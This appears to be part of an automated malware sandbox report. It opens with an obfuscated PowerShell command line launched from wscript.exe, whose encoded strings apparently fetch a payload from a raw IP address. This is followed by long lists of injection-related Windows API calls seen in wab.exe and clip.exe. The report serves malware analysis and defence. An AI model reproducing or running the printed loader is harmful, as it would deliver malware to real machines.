          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.baJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B735C0 NtCreateMutant,LdrInitializeThunk,15_2_23B735C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72B60 NtClose,LdrInitializeThunk,15_2_23B72B60
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72DF0 NtQuerySystemInformation,LdrInitializeThunk,15_2_23B72DF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72C70 NtFreeVirtualMemory,LdrInitializeThunk,15_2_23B72C70
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B74340 NtSetContextThread,15_2_23B74340
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B73090 NtSetValueKey,15_2_23B73090
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B73010 NtOpenDirectoryObject,15_2_23B73010
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B74650 NtSuspendThread,15_2_23B74650
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72BA0 NtEnumerateValueKey,15_2_23B72BA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72B80 NtQueryInformationFile,15_2_23B72B80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72BF0 NtAllocateVirtualMemory,15_2_23B72BF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72BE0 NtQueryValueKey,15_2_23B72BE0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72AB0 NtWaitForSingleObject,15_2_23B72AB0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72AF0 NtWriteFile,15_2_23B72AF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72AD0 NtReadFile,15_2_23B72AD0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B739B0 NtGetContextThread,15_2_23B739B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72FB0 NtResumeThread,15_2_23B72FB0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72FA0 NtQuerySection,15_2_23B72FA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72F90 NtProtectVirtualMemory,15_2_23B72F90
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72FE0 NtCreateFile,15_2_23B72FE0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72F30 NtCreateSection,15_2_23B72F30
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72F60 NtCreateProcessEx,15_2_23B72F60
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72EA0 NtAdjustPrivilegesToken,15_2_23B72EA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72E80 NtReadVirtualMemory,15_2_23B72E80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72EE0 NtQueueApcThread,15_2_23B72EE0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72E30 NtWriteVirtualMemory,15_2_23B72E30
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72DB0 NtEnumerateKey,15_2_23B72DB0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72DD0 NtDelayExecution,15_2_23B72DD0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72D30 NtUnmapViewOfSection,15_2_23B72D30
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B73D10 NtOpenProcessToken,15_2_23B73D10
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72D10 NtMapViewOfSection,15_2_23B72D10
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72D00 NtSetInformationFile,15_2_23B72D00
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B73D70 NtOpenThread,15_2_23B73D70
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72CA0 NtQueryInformationToken,15_2_23B72CA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72CF0 NtOpenProcess,15_2_23B72CF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72CC0 NtQueryVirtualMemory,15_2_23B72CC0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72C00 NtQueryInformationProcess,15_2_23B72C00
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72C60 NtCreateKey,15_2_23B72C60
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_04FC8560 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,15_2_04FC8560
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C635C0 NtCreateMutant,LdrInitializeThunk,20_2_04C635C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C64650 NtSuspendThread,LdrInitializeThunk,20_2_04C64650
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C64340 NtSetContextThread,LdrInitializeThunk,20_2_04C64340
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62CA0 NtQueryInformationToken,LdrInitializeThunk,20_2_04C62CA0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62C60 NtCreateKey,LdrInitializeThunk,20_2_04C62C60
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62C70 NtFreeVirtualMemory,LdrInitializeThunk,20_2_04C62C70
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62DD0 NtDelayExecution,LdrInitializeThunk,20_2_04C62DD0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62DF0 NtQuerySystemInformation,LdrInitializeThunk,20_2_04C62DF0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62D10 NtMapViewOfSection,LdrInitializeThunk,20_2_04C62D10
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62D30 NtUnmapViewOfSection,LdrInitializeThunk,20_2_04C62D30
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62EE0 NtQueueApcThread,LdrInitializeThunk,20_2_04C62EE0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62E80 NtReadVirtualMemory,LdrInitializeThunk,20_2_04C62E80
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62FB0 NtResumeThread,LdrInitializeThunk,20_2_04C62FB0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62F30 NtCreateSection,LdrInitializeThunk,20_2_04C62F30
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C639B0 NtGetContextThread,LdrInitializeThunk,20_2_04C639B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62BE0 NtQueryValueKey,LdrInitializeThunk,20_2_04C62BE0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62BF0 NtAllocateVirtualMemory,LdrInitializeThunk,20_2_04C62BF0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62B60 NtClose,LdrInitializeThunk,20_2_04C62B60
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C63090 NtSetValueKey,20_2_04C63090
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C63010 NtOpenDirectoryObject,20_2_04C63010
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62CC0 NtQueryVirtualMemory,20_2_04C62CC0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62CF0 NtOpenProcess,20_2_04C62CF0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62C00 NtQueryInformationProcess,20_2_04C62C00
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62DB0 NtEnumerateKey,20_2_04C62DB0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C63D70 NtOpenThread,20_2_04C63D70
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62D00 NtSetInformationFile,20_2_04C62D00
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C63D10 NtOpenProcessToken,20_2_04C63D10
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62EA0 NtAdjustPrivilegesToken,20_2_04C62EA0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62E30 NtWriteVirtualMemory,20_2_04C62E30
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62FE0 NtCreateFile,20_2_04C62FE0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62F90 NtProtectVirtualMemory,20_2_04C62F90
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62FA0 NtQuerySection,20_2_04C62FA0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62F60 NtCreateProcessEx,20_2_04C62F60
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62AD0 NtReadFile,20_2_04C62AD0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62AF0 NtWriteFile,20_2_04C62AF0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62AB0 NtWaitForSingleObject,20_2_04C62AB0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62B80 NtQueryInformationFile,20_2_04C62B80
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62BA0 NtEnumerateValueKey,20_2_04C62BA0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_009E75C0 NtCreateFile,20_2_009E75C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_009E7720 NtReadFile,20_2_009E7720
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_009E7890 NtClose,20_2_009E7890
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_009E79E0 NtAllocateVirtualMemory,20_2_009E79E0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BABCAD67_2_00007FFD9BABCAD6
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9BABD8827_2_00007FFD9BABD882
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B8739A15_2_23B8739A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C003E615_2_23C003E6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4E3F015_2_23B4E3F0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF132D15_2_23BF132D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BFA35215_2_23BFA352
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2D34C15_2_23B2D34C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B452A015_2_23B452A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5D2F015_2_23B5D2F0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE12ED15_2_23BE12ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5B2C015_2_23B5B2C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE027415_2_23BE0274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4B1B015_2_23B4B1B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C001AA15_2_23C001AA
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF81CC15_2_23BF81CC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BDA11815_2_23BDA118
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C0B16B15_2_23C0B16B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3010015_2_23B30100
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F17215_2_23B2F172
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B7516C15_2_23B7516C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC815815_2_23BC8158
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF70E915_2_23BF70E9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BFF0E015_2_23BFF0E0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BEF0CC15_2_23BEF0CC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B470C015_2_23B470C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BFF7B015_2_23BFF7B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3C7C015_2_23B3C7C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4077015_2_23B40770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6475015_2_23B64750
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5C6E015_2_23B5C6E0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF16CC15_2_23BF16CC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BDD5B015_2_23BDD5B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C0059115_2_23C00591
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4053515_2_23B40535
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF757115_2_23BF7571
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BEE4F615_2_23BEE4F6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BFF43F15_2_23BFF43F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3146015_2_23B31460
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF244615_2_23BF2446
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5FB8015_2_23B5FB80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB5BF015_2_23BB5BF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B7DBF915_2_23B7DBF9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF6BD715_2_23BF6BD7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BFFB7615_2_23BFFB76
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BFAB4015_2_23BFAB40
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BDDAAC15_2_23BDDAAC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B85AA015_2_23B85AA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3EA8015_2_23B3EA80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BEDAC615_2_23BEDAC6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB3A6C15_2_23BB3A6C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BFFA4915_2_23BFFA49
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF7A4615_2_23BF7A46
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B429A015_2_23B429A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C0A9A615_2_23C0A9A6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5696215_2_23B56962
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4995015_2_23B49950
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5B95015_2_23B5B950
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B268B815_2_23B268B8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6E8F015_2_23B6E8F0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B438E015_2_23B438E0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BAD80015_2_23BAD800
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4284015_2_23B42840
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4A84015_2_23B4A840
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BFFFB115_2_23BFFFB1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B41F9215_2_23B41F92
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B32FC815_2_23B32FC8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B60F3015_2_23B60F30
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B82F2815_2_23B82F28
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BFFF0915_2_23BFFF09
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB4F4015_2_23BB4F40
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B49EB015_2_23B49EB0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B52E9015_2_23B52E90
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BFCE9315_2_23BFCE93
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BFEEDB15_2_23BFEEDB
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BFEE2615_2_23BFEE26
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B40E5915_2_23B40E59
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B58DBF15_2_23B58DBF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3ADE015_2_23B3ADE0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5FDC015_2_23B5FDC0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4AD0015_2_23B4AD00
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF7D7315_2_23BF7D73
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF1D5A15_2_23BF1D5A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B43D4015_2_23B43D40
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BE0CB515_2_23BE0CB5
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B30CF215_2_23B30CF2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BFFCF215_2_23BFFCF2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB9C3215_2_23BB9C32
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B40C0015_2_23B40C00
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CDE4F620_2_04CDE4F6
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CE244620_2_04CE2446
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C2146020_2_04C21460
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CEF43F20_2_04CEF43F
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CF059120_2_04CF0591
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CCD5B020_2_04CCD5B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CE757120_2_04CE7571
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C3053520_2_04C30535
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CE16CC20_2_04CE16CC
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C4C6E020_2_04C4C6E0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C2C7C020_2_04C2C7C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CEF7B020_2_04CEF7B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C5475020_2_04C54750
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C3077020_2_04C30770
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CDF0CC20_2_04CDF0CC
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C370C020_2_04C370C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CE70E920_2_04CE70E9
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CEF0E020_2_04CEF0E0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CE81CC20_2_04CE81CC
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CF01AA20_2_04CF01AA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C3B1B020_2_04C3B1B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CFB16B20_2_04CFB16B
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C6516C20_2_04C6516C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C1F17220_2_04C1F172
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C2010020_2_04C20100
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CCA11820_2_04CCA118
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C4B2C020_2_04C4B2C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CD12ED20_2_04CD12ED
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C4D2F020_2_04C4D2F0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C352A020_2_04C352A0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CD027420_2_04CD0274
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CF03E620_2_04CF03E6
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C3E3F020_2_04C3E3F0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C7739A20_2_04C7739A
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C1D34C20_2_04C1D34C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CEA35220_2_04CEA352
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CE132D20_2_04CE132D
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C20CF220_2_04C20CF2
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CEFCF220_2_04CEFCF2
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CD0CB520_2_04CD0CB5
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C30C0020_2_04C30C00
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CA9C3220_2_04CA9C32
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C4FDC020_2_04C4FDC0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C2ADE020_2_04C2ADE0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C48DBF20_2_04C48DBF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C33D4020_2_04C33D40
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CE1D5A20_2_04CE1D5A
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CE7D7320_2_04CE7D73
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C3AD0020_2_04C3AD00
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CEEEDB20_2_04CEEEDB
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C42E9020_2_04C42E90
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CECE9320_2_04CECE93
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C39EB020_2_04C39EB0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C30E5920_2_04C30E59
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CEEE2620_2_04CEEE26
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C22FC820_2_04C22FC8
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C31F9220_2_04C31F92
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CEFFB120_2_04CEFFB1
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CA4F4020_2_04CA4F40
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04CEFF0920_2_04CEFF09
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C72F2820_2_04C72F28
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C50F3020_2_04C50F30
